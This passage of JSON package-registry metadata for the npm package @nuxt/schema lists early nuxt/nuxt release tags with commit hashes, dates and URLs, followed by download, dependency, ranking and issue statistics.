0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:52:09.526Z","dependent_packages_count":1171,"downloads":7347101,"downloads_period":"last-month","dependent_repos_count":7494,"rankings":{"downloads":0.1672852135795111,"dependent_repos_count":0.2792572502874996,"dependent_packages_count":0.06075197885483501,"stargazers_count":0.15559799533710655,"forks_count":0.5233980135042239,"docker_downloads_count":0.6781401091461025,"average":0.3107384267848798},"purl":"pkg:npm/%40nuxt/schema","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/schema","docker_dependents_count":149,"docker_downloads_count":19484,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/schema","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/schema/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.